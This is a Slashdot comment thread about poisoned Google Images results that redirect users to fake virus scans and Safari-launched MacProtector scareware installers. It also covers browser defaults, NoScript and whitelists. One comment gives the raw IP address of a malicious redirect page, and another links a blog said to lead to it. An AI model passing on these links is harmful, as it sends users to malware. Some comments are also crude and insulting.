In other news: I just noticed a blinking light on my dashboard, so instead of calling my car dealership, I just assumed the worst and torched the car.

I Googled the problem first and there was so little information about it that it was unsafe to draw any solid conclusions.

Re:Mac is vulnerable too

[Teckla]

Not a Mac issue, but a user issue.

I think you're expecting users to be far too familiar with the technical details of OS X installers.

On other operating systems, installers are not harmless little fuzzy creatures. If an installer is running, scary foreign code has already run. Sure, it might not have the security to install a keylogger, but at the very least, the contents of your $HOME directory have potentially already been compromised.

This is part of the reason Slashdot sucks. If we were talking about cars instead, Slashdot would expect everyone to be a master mechanic, otherwise the Slashdot crowd would consider the person a "haha idiot n00b!".

A lot of people use their computer as a tool to achieve some other goal. They don't use a computer just for the sake of using a computer. Expecting them to know that OS X installers are harmless little fuzzy creatures where nothing bad can possibly happen if you just exit the installer is asking a bit much.

Re:Mac is vulnerable too

[Teckla]

After Safari downloaded and unzipped the zip file, you would then have ended up with a file in your ~/Downloads directory - the case I've seen is MacProtector.mpkg which is an installer package that has to be double-clicked on to launch and then this software needs an Administrator password to be entered.

Let me be very clear on one point. Safari automatically ran the installer after the download completed. I was skeptical that my wife was accurate when she said that to me, so I tested it myself. Her story was the truth. Automatic download and execution of installer. It never asked for an administrator password (probably because we didn't step through the installer?).

The message I seem to be getting in this thread (besides "it's all your fault, stupid") is that OS X installers are completely and utterly 100% no-questions-asked cute little furry safe friendly creatures that can only possibly do harm if you step through them.

Since that is not the case with installers on any other OS I've used -- and as a long-time software developer, I've probably used dozens -- I assumed that, at the very least, the contents of her $HOME directory were compromised.

In any case, I think Safari has some stunningly bad defaults, and I'm disappointed Apple would choose such defaults.

Re:Mac is vulnerable too

[jafiwam]

Which of course means it's one step away from being a full exploit, so it's OK?

System Installer is perfect software? It's version 1.0 and has never been updated because it was perfect the first time out?

I know thinking about security is a bit new for a lot of Mac users, so here's how it works:

Security is like an onion. It occurs in layers. It's absolutely true that you don't have to get all bent out of shape over one layer being compromised. Chances are, the others will take care of things. However, the attitude that that one compromised layer won't cause a problem and doesn't need to be fixed is a bad one. Because, you can always assume that each layer is flawed even if it has always worked perfectly in the past. Using a number of flawed layers that have flaws that don't add up to a hole is almost as good as perfect security. In fact, that's the best we can get. Because there is no "Perfect" involved. Ever.

Too bad perfect security doesn't exist. And, usable security that still lets you get work done is even farther from perfect.

In this case, letting a file get to the computer hard drive user space (not in some temp folder or memory) somewhere is a huge hole in a layer of the onion.

Training users about using an annoying log in to install (which means 'do this without thinking' the very DEFINITION of training) software is another hole. One we probably can't fix because it's human nature.

NOW, you are saying another layer isn't a big deal. Guess what, there aren't that many layers. Google's treatment of these shit sites is one layer, JavaScript and Browser security are other layers, the user interface is yet another one, and the user's brain is in there somewhere too.

You aren't doing good security if you ignore layers. Sometimes you make compromises, but know that in each layer there are flaws, and sometimes the simplest stuff stops the bad guys cold because all the other layers were gotten through. (I saw a server once that was saved on reboot from total rooting because the user was a Turk, and couldn't spell the directory path in English. Had he used a system variable %systemfolder% he would have been in. He got through everything else.)

So. Yes, Google should fix some of this stuff. However it's not their battle to fight. The folks over in Apple / Safari / JavaScript failed on this one big time.

In my opinion, Google needs to be spending a lot more time letting users control what they search and where they go. I really don't fucking care to visit a web server hosted in former soviet block countries EVER. I know Google has this information, why not use it? Added bonus, they can stay ahead of the search game by noting what users do. Here's a hint; if all the guys that search for instructions for stuff on the internet (which by definition is not Lusers) block a site, Google should too.

Re:Mac is vulnerable too

[Teckla]

It didn't. It was you who decided not to trust the system.

The fact that Safari will automatically download and execute installers may be technically safe -- just an annoyance, at worst -- but expecting users of OS X to know that OS X installers are 100% safe little furry friendly creatures that cannot possibly do any harm whatsoever to your computer is asking a bit much since installers work different on, well, every other OS in existence, in my (very broad) experience.

On other operating systems, installers are foreign code that can do all sorts of harm to the contents of your $HOME directory at the very least.

Re:Mac is vulnerable too

[makomk]

On other operating systems, installers are not harmless little fuzzy creatures.

I don't think they always have been on Macs either. For example, at one point they could run code as root without prompting for the user's password (if you were logged into an admin account, which most Mac users are because that's what's created by default at install time).

Re:Mac is vulnerable too

[Teckla]

I disagree. It's a very convenient setting

We finally agree!

It's a very convenient setting... for malware authors.

Re:Mac is vulnerable too

[Teckla]

Unlike windows, mac provides program installation as an OS service. An mpkg is an installable file, not an installer. The malware was not running it's own code, it was triggering the operating system's installer feature. Until you allow the OS to install the program nothing is going to happen to your mac. For sure it's arguably bad that safari automatically asks you to install a random program from the internet, but it's not running untrusted code - it's asking you whether you want to trust (and install) this code.

That's an excellent description of the details of OS X .mpkg files. Thank you.

Re:Mac is vulnerable too

Wow, overstated much?

Re:Mac is vulnerable too

...it downloaded a zip file. Is there any browser that wont do that?

Re:Mac is vulnerable too

I think what it boils down to, is no matter how secure you make a system, if the system's users don't know how to respond, you will eventually have problems.

My impression is that casual Mac users are just as concerned as casual Windows users--which means not at all. Therein lies your problem, and I would expect that Mac users are even at a disadvantage since few people have been harping at them to not simply agree to everything presented to the user, because Macs are more "secure" and don't have malware or viruses.

Linux wins out in part because its users tend to be more advanced than either Mac or Windows users. They can smell a rat better when the system behaves differently or prompts for something unusual.

Teckla, you shouldn't blame Apple entirely for this. Believing that nothing bad could happen is partially to blame. Some level is paranoia is good when it's a fact that there are cross platform applications out there that very well have the ability to identify what OS it's connected and then drop or pull the proper payload accordingly, once the victim clicks OK.

Re:Mac is vulnerable too

[armanox]

I'm not going to say that's a bad thing if the link is dead now. Since I'm on a Windows box atm, I'm not going to check (don't like taking chances).

Re:Mac is vulnerable too

[Low+Ranked+Craig]

I worked at getting this to happen this morning, and I finally did. What happens is that you search for an image, click on it, it redirects you to a site like this http://69.50.202.201/f1f7925050f1f83d3b0fc524a72f5af09f55c52837b293fb Which displays a bogus virus scanning screen and downloads a zip file. In safari if you have open safe attachments checked it will unzip the file, anti-malware.zip in this case and run the installer. THis is true. However, this is a social engineering application. YOu still have to click continue and provide your password to install anything. As far as it goes it is very well done, but it is not a drive by install - you MUST EXPLICITLY GIVE PERMISSION to install it. I'm sure a bunch of people will install it, but there's nothing you can do about that. I felt comfortable enough to search this out and try it myself with no ill effects. Turn off open safe attachments in Safari if it bothers you.

Re:Mac is vulnerable too

[Low+Ranked+Craig]

Because the user gave permission by clicking the checkbox in preferences?

Re:Mac is vulnerable too

[cathector]

thanks for doing that research.
yes, it's clear that you need to click "okay, install stuff" to have anything actually bad happen,
but because users are ignorant, clumsy, inattentive, etc, even getting to that point is a huge security flaw.
social engineering is a real danger, and the browser/OS need to do everything they can to help the user survive against it.

> I'm sure a bunch of people will install it, but there's nothing you can do about that.
that just seems like not facing the problem.
consider your grandmother who does her banking online.
how can you describe to her what's safe to install and what isn't ?

the legitimate OSX installer should never open up for something the user hasn't intended.

Re:Mac is vulnerable too

The social engineering gimics and turning off security defaults have been getting Windows users for years. Just like Nigerian scammers these guys know how to prey on unsuspecting people's emotions, etc. The more Macs there are, the more we'll see things like this. I actually think MacDefender is a crude attempt, since Apple fanbois think Macs are invulnerable, many won't click it. Just wait until the "steve_jobs_naked_picture" Mac virus does its rounds. Then, we'll see some real Mac fanboi action.

Re:Mac is vulnerable too

No, Safari won't execute a an .mpkg as standard -

I hear almost an indignant nonbelief from the Mac fanbois on here. There is *NO WAY* Macs could open a .mpkg or whatever...

@Mac Fanbois
Are you sure? Is Apple's code perfect? We have half a dozen people claiming it happened on their Macs.

@Mac Virus Victims
Post the damn link so we can see for ourselves...

Re:Mac is vulnerable too

Why the hell are any downloaded files considered "safe" to open, especially by default? That's like assuming the water flowing in a river through a very populated part of the world is automatically going to be "safe" to drink.

Re:Mac is vulnerable too

[Billly+Gates]

No you don't.

Look up buffer overflows. You can bypass the OS 100% and it wont even know it got infected nor check for security.

Re:Mac is vulnerable too

[toddestan]

It's pretty obvious that the malware exploited some holes in OS X to get that far. Is there any reason to believe that the installer will suddenly play nice and not exploit more holes to infect the system without having to click on it and provide a password? Pwn2Own pretty much proves that OS X is full of security holes, so the only way to be completely sure is to nuke it and start over.

Re:Mac is vulnerable too

[jimicus]

I tried this myself. It downloads a zip which contains a .mpkg, which OS X automatically executes.

It's linked to from here if you want to try it yourself:

http://cobbaut.blogspot.com/

The installation process itself is not automated, you'd still need to click through and enter your admin password, but I didn't let it get that far.

Re:Mac is vulnerable too

[jimicus]

Unless Safari picked up the configuration from when I migrated from a machine running Tiger, Snow Leopard does exactly the same thing.

Re:Mac is vulnerable too

and provided her admin credentials, in order to have installed/run something

Users on OS X can install apps in their own account (even in their own "Applications/" folder) without needing admin rights.

Is this malware only executing with admin rights?

Re:Mac is vulnerable too

[PhunkySchtuff]

OK, I've just tested this (with another installer, not the malware) and you are right.

Safari downloads the file, unzips it and launches the Installer app.

I completely agree with you that this is an absolutely crazy default setting and it should be changed.

I'm adding the following script line to the first login script that I add to every SOE that I create:

defaults write com.apple.Safari AutoOpenSafeDownloads -boolean No

I will also be putting this setting in Workgroup Manager just to be 100% sure.

The installer will ask for an administrator password, but you do need to step through it. It will also warn you if the installer has a preflight or installer check script as well that is executed before the installation is performed, although just about everyone (myself included) would click OK to this.

Re:Mac is vulnerable too

[Low+Ranked+Craig]

I don't really have an answer. I do prefer the way Macs do things with permission and installing things over Windows. Microsoft's solution is to basically lock everything down and makes you answer yes every time you want to do something. OS X asks you for your password to do dangerous things. I'm not defending Safari here - it really needs to be locked down, but everyone should simply uncheck the "open safe files after download". I believe that in ore recent versions it is defaulted to off, but I can't verify that. Personally I use chrome anyway because I just like it better for many subtle reasons. I understand that most of the people in userland are generally clueless when it comes to computers and that this is what criminals prey upon, but I guess I have a hard time feeling sympathy. I mean here it is 2011, I've had countless windows machines, linux boxes and macs hooked up to the internet and I've never contracted a virus or malware. I don't run virus software, but I do have a sophisticated firewall. How many times do people need to be told not to install something if they don't know what it is? I'm sorry but if someone visits a website and ends up with an installer and they click "yes - install" and provide their password, they kinda sorta deserve what they get regardless of the OS.

Re:Mac is vulnerable too

[gmhowell]

So, they disabled the preference, but didn't remove it completely? I'm sorry, but that's just not responsible. There are some things which the user should have to do without help. If he wants to open the file, fine, but automatically opening random files that have been downloaded isn't something that should be allowed, with or without the users approval.

Wait, so this week's problem with Macs is that they offer too much control?

Re:Mac is vulnerable too

No, your WIFE burned you good and hard by happily clicking through a random installer that popped up.

Firefox and Chrome are not immune to bad user behaviour either. Sorry....

You have to run them

[Snaller]

"By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. "

I tried the noscript crap for a moment, every single page has tons of javascript, most of them don't work if its disabled. Its possibly you just browse to your homepage made in notepad, but for the rest of the world YOU MUST HAVE JAVASCRIPT ON.

Re:You have to run them

[Abstrackt]

Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

Re:You have to run them

[0123456]

Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

Great idea. Then I can blacklist www.thissiteissafehonest.com _AFTER_ it's used Javashit to download malware to my computer.

Disabling Javashit by default is the only safe way to browse the web these days.

Re:You have to run them

"By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. "

I tried the noscript crap for a moment, every single page has tons of javascript, most of them don't work if its disabled. Its possibly you just browse to your homepage made in notepad, but for the rest of the world YOU MUST HAVE JAVASCRIPT ON.

Use NoScript in blacklist mode, I do, it makes the web a much nicer place. Of course, you need other protection too. Every time I encounter a new buggy, too slow or resource hungry, or plain malicious javascript (detected by other software and Firefox extensions), I block it in Noscript, after less then two month I've usually blocked enough to only get annoyed by the web once a month or so. After I got a working blacklist, I can disable som Firefox extensions that I used to detect bad javascript, and Firefox become less slow(I don't think Firefox nor Chrome is fast, with all the f-ing extensions and other crap you must run to make them usable). There is also ready-made blacklists to download from the web.

Even if both blacklists and whitelists are disabled in NoScript, it catches a lot of malicious javascript code. (Not all the ones described in this article though, but that is what I use blacklists is for.)

Opera have a builtin script-blocker that by default works in blacklist mode, but with a more convenient and less obtrusive UI then NoScript and YesScript for Firefox. Unfortunately I have to use Firefox because of legal (guarantees & contracts) and support reasons for some web-sites (bank, stock broking, web-mail et.c.) and as I don't like switching between browsers, I use Firefox as my default browser, but script-blocking and many other things (builtins in Opera, clunky, slow and buggy addons in Firefox) in Opera is so ridiculously much better then in Firefox. If you are not forced to use Firefox, I recommend trying Opera.

Re:You have to run them

[jimicus]

That's default-permit. It doesn't work. If it did, we wouldn't have to update antivirus scanners every day and still find malware getting through.

Re:You have to run them

[WuphonsReach]

Try YesScript. You can blacklist sites that cause problems while letting the rest through without having to explicitly whitelist them.

Blacklists are useless in an environment like this, just like A/V scanners that depend on signatures won't stop infection. The problem with a blacklist is that it is reactive, you're always behind the curve, and you can't tell that a piece of code is bad until it has already executed and inserted malware into the system.

The reason that whitelists are better is that they are paranoid by default. Nothing executes unless it is from a site on the whitelist. Which means that if some hacker infects obscure-site-a.com and tricks you into visiting, the scripts on that obscure site will not run.

The vast majority of these hacks are done by either inserting malicious code into a 3rd party ad served along side the page content or by hacking sites that are not well administered. In the case of the ad exploit, the hackers get one ad approved, then swap out the content after the approval. They get away with it because the ad network does not properly track things and because they're not verifying the source. In the case of the obscure web site that gets hacked, the hackers use a tool to inject code into the existing pages, or break in via weak / sniffed FTP passwords and then insert code. The hacker then uses email or redirects / links on other sites to point your browser at the infected site.

Whitelists are not a perfect defense, but having a whitelist with a few dozen or few hundred sites reduces your infection risk to just those sites. Now the attacker's job just got a lot more difficult. It's not good enough that they hack a random site out there and trick you into visiting the link, they have to hack a site that is on your unique whitelist. That can easily cut your risk factor by a few orders of magnitude.

(The major weakness of whitelists is that popular sites are likely whitelisted by the user. So if a major breach occurs, you're still screwed. On the flip side, the popular sites are hopefully better admin'd, monitored and protected.)

Re:I see how it is

"bombing" is innocuous and comedic? I take it there hasn't been a war in your country recently.

Web 101: Google don't fuckin work without js

[poptones]

That's the problem. They had a GREAT web search page but then had to fuck it up with IFRAMES (web security 101: IFRAMES are not made for use outside a corporate firewall) and eight layers of javascript. I use google image search a LOT and the solution ultimately came down to me carving out a command line google grabber as a means to avoid all their bullshit.

gggrabber -a -s xga +its+britney+bitch|wget -i -

It sucks not having instant real time update on search terms, but it's a lot less dangerous to sort through a bunch of extraneous images than to use that fucked up "improved" google image search.

A suggestion to browser vendors

FTFA: but believes that Google could help by not using an iframe to display the results.
The browser vendors could help by making it impossible for an iframe from a different domain to do anything to the page outside it, including navigating away. I've had this happen quite recently; it wasn't trying to serve me malware, just a run-of-the-mill ‘break-out-of-frames’ script, but it was still mightily annoying.

Linux will be infected soon.

It's only a matter of time. Mac users got popular enough and now they have it. With many gullible people using Linux being tricked into a false sense of security. Android is already targeted, and the viruses will infect "PC" Linux after that. I look forward for the smug to be wiped off Slashdot users faces.

Only windows is attacked?

[SpaceLifeForm]

They do not mention what the malware is.

Re:Only windows is attacked?

It's attacking OSX machines as well as windows; doesn't seem to attack Linux yet.

Interestingly, the pages adapt the content for the browser being used, to make it look like it's the browser doing the scan.

Google Images falling downhill

I've pretty much stopped using them since they switched over to the "improved" interface where the images increase by 20% when you hover over them. Doesn't improve visibility, and obscures the surrounding images. I was spending more time trying to find a safe spot to park my cursor then looking at the results.

Then instead of linking to the page with the image on it, it links to some intermediary page. Requires scripts, with no easy way to switch back to the old interface, and with NoScript on, it often just gives a "no results found" return on any search criteria. In a word, crap.

Mostly a WordPress / PHP problem

[Animats]

This isn't really a search problem. The problem is break-ins to vulnerable sites that replace site content with phony pages leading to attacks. Google is finding the phony pages and indexing them. Mostly it's a WordPress or PHP problem.

Bing sometimes plays dirty

[simoncpu+was+here]

I've personally reported poisoned links that transfers the users into Bing image search. Whether it's unintentional or not, it tricks some users into using Bing instead.

"whether I'll be moving her..."

You talk about your wife as though she has no say in the matter and she has to accept whatever you decide. What century are you living in?

Re:"whether I'll be moving her..."

Since this is slashdot, he probably bought her from the philippines or eastern europe.

Re:"whether I'll be moving her..."

[gmhowell]

Since this is slashdot, he probably bought her from the philippines or eastern europe.

That's where realdolls ships from?

NOSCRIPT should redirect to goatse

[cheekyboy]

To punish the noscript people, lets all redirect them linux clients with no javascript to goatse

That will be funny.

And if your linux is SOOO secure, running JS will have no bad impact.

Get a clue. Or buy an ipad and do your browsing there.

Safety first!

On my workstation [Linux] javascript has always been disabled and flash is not installed either. If i absolutely have to enable javascript for some site, i start a VM where the rootfs is mounted on ramdisk so any changes made are cleaned at shutdown. This post is written from within the VM.

Interrupting dialogue box

[Daghead]

Most people are not going to disable javascript because they can't comprehend it or its too much of a nuisance. NoScript is great though when you set it to ignore bookmarks and can just hit "allow all this page". What bothers me most about this crap is the dialogue box used to interfere with closing the tab, also allowing the tab to reappear with session restore if you kill the whole window. The average n00bs have to be falling for this like dominoes. https://lh5.googleusercontent.com/_s3wM0-7Zzhg/TZ9zJ7IKr3I/AAAAAAAAASY/SYcC0tJPJZ0/Browser%20exploit%20rage%2002.png Subscribing to Sophos Labs' YouTube channel has been rewarding: http://youtu.be/9Xna558F_m8

Taking their money is required

[currently_awake]

They do this because it pays (same with spam). When it stops paying they will stop doing it.

no corporate responsibility

[currently_awake]

It's the new world order where only individuals are liable, not corporations. What's the point of being rich and powerful if you have to behave? Next thing you know people might suggest that banks that lose all their money be allowed to go broke or politicians who pass illegal laws go to jail.

Sounds like selection bias

[zippthorne]

We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

And do you have a way in place to measure it?

I've never seen a bear crap in the woods. But that doesn't mean I'd claim that bears never crap in the woods. It just means that I don't go hiking in woods where i'm likely to encounter bears at all.

But there's way too much information

to decode the Matrix...

Don't pirate images

And the moral behind this incident is get a life, and stop pirating images!

Re:Don't pirate images

Absolutely! You should not steal anyone's images, even if Google has been intermediary in the theft.

Of all the images that you find on Google's image search, they will have been harvested from web sites that clearly state that the web page has been published by and is copyrighted to some entity... and Google is not the Copyright owner, nor does Google have the right to display images owned by other entities.

The whole thing is not only ethically wrong, it is in fact illegal!

Wordpress vulnerabilities and Drupal security

Interesting that Wordpress sites are often compromised, due to poor maintenance and lack of knowledge about vulnerabilities. The Drupal community has a more distributed approach to security, and with default settings your site will alert you if a component is updated for security reasons. Of course, there are owners of Drupal sites that ignore these warnings and may introduce vulnerabilities with poorly written custom code. Ah well.